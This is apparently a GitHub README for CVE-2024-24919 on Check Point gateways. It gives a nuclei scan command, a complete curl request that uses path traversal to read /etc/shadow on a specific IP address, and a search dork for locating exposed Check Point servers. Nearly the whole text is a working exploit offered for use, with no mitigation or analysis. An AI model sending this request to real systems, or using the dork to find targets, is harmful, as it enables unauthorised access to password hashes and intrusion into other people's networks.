Skip to content

Latest commit

 

History

History
23 lines (12 loc) · 780 Bytes

README.md

File metadata and controls

23 lines (12 loc) · 780 Bytes

Check point:CVE-2024-24919

2024-05-31_08-14

run CVE

nuclei -list chick.txt -t CVE-2024-24919.yaml

Replace with the target IP address, and this command will attempt to access the /etc/shadow file, which contains password hashes.

curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'

cve

Dork: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"